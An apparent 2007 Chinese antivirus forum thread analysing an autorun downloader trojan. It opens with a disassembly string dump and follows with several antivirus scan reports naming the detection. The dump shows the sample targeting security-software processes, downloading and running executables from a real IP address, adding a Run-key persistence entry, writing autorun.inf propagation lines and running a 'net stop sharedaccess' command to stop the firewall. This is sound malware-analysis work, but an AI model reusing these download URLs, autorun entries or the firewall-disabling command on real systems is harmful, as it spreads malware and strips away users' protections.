autorun下载者兼皮炎平fbb09a

显示全部楼层 · 发表于 2007-9-14 19:57:24

0040444C ASCII "SeDebugPrivilege"
0040445C ASCII 0
00404525 MOV EAX,999.00404608 ASCII "360tray.exe"
0040455B MOV EAX,999.0040461C ASCII "360safe.exe"
004045A8 MOV EAX,999.00404630 ASCII "avp.exe"
00404608 ASCII "360tray.exe",0
0040461C ASCII "360safe.exe",0
00404630 ASCII "avp.exe",0
00404638 PUSH 999.0040474C ASCII "shell32.dll"
00404647 PUSH 999.00404758 ASCII "ShellExecuteA"
0040465C PUSH 999.00404768 ASCII "plmmsbl.dll"
0040466B PUSH 999.00404774 ASCII "URLDownloadToFileA"
00404684 PUSH 999.00404788 ASCII "C:\a.exe"
00404689 PUSH 999.00404794 ASCII "http://218.61.18.175/hao.exe"
0040469E PUSH 999.00404788 ASCII "C:\a.exe"
004046A3 PUSH 999.004047D8 ASCII "open"
004046BE PUSH 999.004047E0 ASCII "C:\b.exe"
004046C3 PUSH 999.004047EC ASCII "http://218.61.18.175/wei.exe"
004046D8 PUSH 999.004047E0 ASCII "C:\b.exe"
004046DD PUSH 999.004047D8 ASCII "open"
004046F8 PUSH 999.00404830 ASCII "C:\c.exe"
004046FD PUSH 999.0040483C ASCII "http://218.61.18.175/haowei.exe"
00404712 PUSH 999.00404830 ASCII "C:\c.exe"
00404717 PUSH 999.004047D8 ASCII "open"（就是前面发的a与b)
a 0040474C ASCII "shell32.dll",0
00404758 ASCII "ShellExecuteA",0
00404768 ASCII "plmmsbl.dll",0
00404774 ASCII "URLDownloadToFil"
00404784 ASCII "eA",0
00404788 ASCII "C:\a.exe",0
00404794 ASCII "http://218.61.18"
004047A4 ASCII ".175/hao.exe",0
004047D8 ASCII "open",0
004047E0 ASCII "C:\b.exe",0
004047EC ASCII "http://218.61.18"
004047FC ASCII ".175/wei.exe",0
00404830 ASCII "C:\c.exe",0
0040483C ASCII "http://218.61.18"
0040484C ASCII ".175/haowei.exe",0
004048CA PUSH 999.0040496C ASCII "svchost.exe"
0040496C ASCII "svchost.exe",0
004049A3 PUSH 999.00404A98 ASCII "Software\Microsoft\Windows\CurrentVersion\policies\explorer"
004049B6 PUSH 999.00404AD4 ASCII "run"
004049C7 MOV ECX,999.00404AE0 ASCII "\dream.exe"
004049EF PUSH 999.00404AEC ASCII "melove"
00404A2D PUSH 999.00404AF4 ASCII "Software\Microsoft\Windows\CurrentVersion\policies\explorer\run"
00404A49 PUSH 999.00404B34 ASCII "dream"
00404A98 ASCII "Software\Microso"
00404AA8 ASCII "ft\Windows\Curre"
00404AB8 ASCII "ntVersion\polici"
00404AC8 ASCII "es\explorer",0
00404AD4 ASCII "run",0
00404AE0 ASCII "\dream.exe",0
00404AEC ASCII "melove",0
00404AF4 ASCII "Software\Microso"
00404B04 ASCII "ft\Windows\Curre"
00404B14 ASCII "ntVersion\polici"
00404B24 ASCII "es\explorer\run",0
00404B34 ASCII "dream",0
00404C5B MOV EAX,999.00404E6C ASCII "OD"
00404E6C ASCII "OD",0
00404F48 MOV EDX,999.00404FB4 ASCII "#32770"
00404FB4 ASCII "#32770",0
0040501C MOV ECX,999.0040533C ASCII "\sbl.inf"
0040504A MOV ECX,999.00405350 ASCII "\sbl.inf.inf"
00405090 MOV EDX,999.00405368 ASCII "[autorun]"
004050AA MOV EDX,999.0040537C ASCII "OPEN=sb.exe"
004050C4 MOV EDX,999.00405390 ASCII "shellexecute=sb.exe"
004050DE MOV EDX,999.004053AC ASCII "shell\Auto\command=sb.exe"
004050F8 MOV EDX,999.004053D0 ASCII "shell=open"
004051B5 MOV EDX,999.004053E8 ASCII ":\autorun.inf"
004051E5 MOV EDX,999.00405400 ASCII ":\ah.exe"
0040522E MOV EDX,999.004053E8 ASCII ":\autorun.inf"
0040524A MOV ECX,999.0040533C ASCII "\sbl.inf"
00405280 MOV EDX,999.004053E8 ASCII ":\autorun.inf"
004052B0 MOV EDX,999.00405400 ASCII ":\ah.exe"
0040533C ASCII "\sbl.inf",0
00405350 ASCII "\sbl.inf.inf",0
00405368 ASCII "[autorun]",0
0040537C ASCII "OPEN=sb.exe",0
00405390 ASCII "shellexecute=sb."
004053A0 ASCII "exe",0
004053AC ASCII "shell\Auto\comma"
004053BC ASCII "nd=sb.exe",0
004053D0 ASCII "shell=open",0
004053E8 ASCII ":\autorun.inf",0
00405400 ASCII ":\ah.exe",0
00405467 MOV ECX,999.004054FC ASCII "\dream.exe"
00405487 MOV ECX,999.004054FC ASCII "\dream.exe"
004054FC ASCII "\dream.exe",0
00405592 PUSH 999.00405610 ASCII "Shell32.dll"
004055A1 PUSH 999.0040561C ASCII "ShellExecuteA"
004055C5 PUSH 999.0040562C ASCII "open"
00405610 ASCII "Shell32.dll",0
0040561C ASCII "ShellExecuteA",0
0040562C ASCII "open",0
004056DB PUSH 999.004057F4 ASCII "omylovesbl"
004056F3 JE 999.004057CA (初始 CPU 选择)
00405700 PUSH 999.00405800 ASCII "cmd.exe /c net stop sharedaccess"（结束防火墙）
00405740 MOV ECX,999.0040582C ASCII "\plmmsbl.dll"
0040575C MOV ECX,999.00405844 ASCII "\urlmon.dll"
004057F4 ASCII "omylovesbl",0
00405800 ASCII "cmd.exe /c net s"
00405810 ASCII "top sharedaccess"
00405820 ASCII 0
0040582C ASCII "\plmmsbl.dll",0
00405844 ASCII "\urlmon.dll",0

复制代码

[ 本帖最后由 promised 于 2007-9-14 20:05 编辑 ]

显示全部楼层 · 发表于 2007-9-14 20:01:35

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\999.rar'
C:\Documents and Settings\Administrator\桌面\999.rar
  [0] Archive type: RAR
  --> 999.exe
   [DETECTION] Is the Trojan horse TR/Agent.25600.27
   [INFO]    The file was deleted!

End of the scan: 2007年9月14日  20:01
Used time: 00:16 min

The scan has been done completely.

显示全部楼层 · 发表于 2007-9-14 20:07:44

微点竟然退出了，上报啊

显示全部楼层 · 发表于 2007-9-14 20:08:08

显示全部楼层 · 发表于 2007-9-14 20:11:25

现在解压时居然报了，
微点在玩我
木马名称:未知间谍软件

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\999.EXE
是木马程序!
已成功阻止其运行,是否
要删除此文件?

但是如果选择不删除，运行，微点在托盘里就没了

显示全部楼层 · 发表于 2007-9-14 20:12:18

好像有人发过了。。

显示全部楼层 · 发表于 2007-9-14 20:13:57

2007-9-14 20:13:31 1189772011 Administrator 2404 Sign of "Win32:Agent-KNZ [Trj]" has been found in "C:\Documents and Settings\Administrator\桌面\999.rar\999.exe" file.

显示全部楼层 · 发表于 2007-9-14 20:15:59

卡巴斯基互联网安全套装 7.0
The requested URL http://bbs.kafan.cn/attachment.php?aid=127619 is infected with Heur.Trojan.Generic virus

显示全部楼层 · 发表于 2007-9-14 20:28:21

Trojan.Win32.Agent.yil

显示全部楼层 · 发表于 2007-9-14 20:41:23

BitDefender

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The blocked web page included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.

autorun下载者兼皮炎平fbb09a

本帖子中包含更多资源

回复 3楼微点卫士的帖子

回复 4楼 promised 的帖子

autorun下载者兼皮炎平fbb09a

本帖子中包含更多资源

回复 3楼 微点卫士 的帖子

回复 4楼 promised 的帖子

回复 3楼微点卫士的帖子